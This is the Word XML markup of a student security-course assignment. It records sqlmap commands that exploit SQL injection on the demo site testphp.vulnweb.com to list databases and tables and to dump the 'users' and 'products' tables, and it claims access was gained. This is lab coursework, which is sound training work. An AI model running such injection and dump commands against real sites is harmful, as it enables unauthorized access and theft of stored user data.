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7A40" w14:textId="39B16424" w:rsidR="004C68BE" w:rsidRDefault="004C68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C68BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hamza Bin Nasim _ 231521911</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790BCA7" w14:textId="3E046CC7" w:rsidR="004C68BE" w:rsidRDefault="004C68BE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Comp_421 (A) Assignment no 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2771CB" w14:textId="0D4544CD" w:rsidR="004C68BE" w:rsidRDefault="004C68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF8D79F" w14:textId="77777777" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">Link of vulnerable website: </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174C8D3" w14:textId="77777777" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http://testphp.vulnweb.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A58FD75" w14:textId="5242D1F7" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>we use this command to list all the databases of the vulnerable site</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">this command returned 2 databases in our case </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>2.information schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43006737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2.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acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> –tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC6C2A" w14:textId="57192EB9" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">We use this command to get the tables in the database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by specifying its name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE69A4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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436CA97A" w14:textId="04734533" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">We use this command to get the tables in the database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by specifying its name in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> quer</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE7A33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4.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acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users --columns    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A761FB" w14:textId="687DD7C1" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">We use this query to obtain the attributes and its datatypes of the table users in the database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by specifying both the DB name and table in the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66B452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5.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acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> --columns  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3FB4C" w14:textId="3ECAFDF3" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t>We use this query to obtain the attributes and its datatypes of all tables one by one in the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC7044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6.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acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T products -dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEAB2AB" w14:textId="0C7D3044" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">We use the dump method to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retieve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the information from the tables .in the above query we get the information of table products </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D50C10" w14:textId="77777777" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://testphp.vulnweb.com/artists.php?artist=1 -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users -dump   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C6F4C" w14:textId="77777777" w:rsidR="004C68BE" w:rsidRDefault="004C68BE" w:rsidP="004C68BE">
      <w:r>
        <w:t xml:space="preserve">In the above query we get the information of table users using dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D2DF6" w14:textId="0CA3B46C" w:rsidR="004C68BE" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>An Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74337574" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">• I have used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> for conducting the attack on the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC2355A" w14:textId="1BF0057F" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">• the command that I have used in this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>attack  using</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> map with the link followed and –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> for their database entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40DB6D" w14:textId="01D84A7F" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> -u testphp.vulnweb.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>artists.php?artist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>=1 –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61AE9DD6" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB"/>
    <w:p w14:paraId="362ECB1A" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t>• After this command entry the system showed two available databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C326A81" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="752CAA55" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D8F660E" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B0593" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> we used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>byt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> typing the command,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06218DC1" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047E52D" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> –u testphp.vulnweb.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>artists.php?artist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">=1 –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> –tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FD4CC" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53039410" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">• the –tables </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> used to get the table of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> we got the table and the screenshot is in the other file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5410B0" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731118D6" w14:textId="2DC0C06B" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t>• I used the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F2AEF8" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F4939" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> –u testphp.vulnweb.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>artists.php?artist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">=1 –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> –T products –columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18BD30" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EBE17" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve">in this command products </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> the table content and we have asked for the products that are in the database of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>acuart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F6886" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C33B7A" w14:textId="43FA059A" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CDA769" w14:textId="77777777" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D53F8" w14:textId="109C5D29" w:rsidR="00DC07AB" w:rsidRPr="00DC07AB" w:rsidRDefault="00DC07AB" w:rsidP="00DC07AB">
      <w:r w:rsidRPr="00DC07AB">
        <w:t>• In this way we can inject the website and get the database on the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35392187" w14:textId="6BC800B9" w:rsidR="004C68BE" w:rsidRDefault="004C68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D09A63" w14:textId="47BFB86F" w:rsidR="004C68BE" w:rsidRDefault="004C68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21134687" w14:textId="69B5BB56" w:rsidR="004C68BE" w:rsidRDefault="004C68BE">
      <w:pPr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7BE0BCA3" w14:textId="7520D692" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For The access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D4A730" w14:textId="3817B97F" w:rsidR="00DC07AB" w:rsidRDefault="00DC07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B66733" wp14:editId="132CC895">
            <wp:extent cx="3635055" cy="2857748"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="5305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5705" name="Picture 530545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0DEA" w14:textId="45067624" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EF1C65" w14:textId="4F086830" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After that we have gained the access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091C904" w14:textId="4BA6DD33" w:rsidR="00DC07AB" w:rsidRDefault="00DC07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C3E835" wp14:editId="42F4FD51">
            <wp:extent cx="3795089" cy="3330229"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="142901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13204" name="Picture 1429013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006" w14:textId="75537F7E" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4EF265" w14:textId="32B5DCA4" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DE5227" w14:textId="3D025C17" w:rsidR="00DC07AB" w:rsidRDefault="00DC07AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E93A17E" w14:textId="4205563C" w:rsidR="00DC07AB" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA1E1A" w14:textId="21F1B146" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502A9E80" w14:textId="6B844F27" w:rsidR="00D97CE9" w:rsidRDefault="00D97C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2304C0" wp14:editId="0C3C1DB1">
            <wp:extent cx="5943600" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="769521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21514" name="Picture 769521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7FC178F" wp14:editId="794BB67C">
            <wp:extent cx="5943600" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155046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6076" name="Picture 155046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6E4BDA40" wp14:editId="117A9034">
            <wp:extent cx="5943600" cy="3465195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="513783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398" name="Picture 51378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2AC8DA1" wp14:editId="25FADFFA">
            <wp:extent cx="5943600" cy="3302635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1847453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53855" name="Picture 18474538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133ECF0" wp14:editId="5AE12EFC">
            <wp:extent cx="5943600" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1010358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8251" name="Picture 1010358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71C80D3" wp14:editId="0BD45317">
            <wp:extent cx="5943600" cy="3627755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="343705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5341" name="Picture 343705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50B" w14:textId="43DFF3CC" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0198B9EC" w14:textId="5B2139EC" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B7EC80" w14:textId="3EF8C0AB" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BEBA6F" w14:textId="4702F6EF" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GIT LINK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB12CD" w14:textId="06FD339E" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB1F284" w14:textId="77777777" w:rsidR="00D97CE9" w:rsidRDefault="00D97CE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9005EC" w14:textId="1AEEB601" w:rsidR="00D97CE9" w:rsidRPr="004C68BE" w:rsidRDefault="00D97CE9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screen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> shots are provided in case you could not open git repository)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D97CE9" w:rsidRPr="004C6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E"/>
    <w:rsid w:val="001F4331"/>
    <w:rsid w:val="004C68BE"/>
    <w:rsid w:val="00811800"/>
    <w:rsid w:val="00D97CE9"/>
    <w:rsid w:val="00D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4E50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3E7385D4-0F75-447F-B0A6-F1EE7675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Bin Nasim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hamza Bin Nasim</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-30T17:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-30T18:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>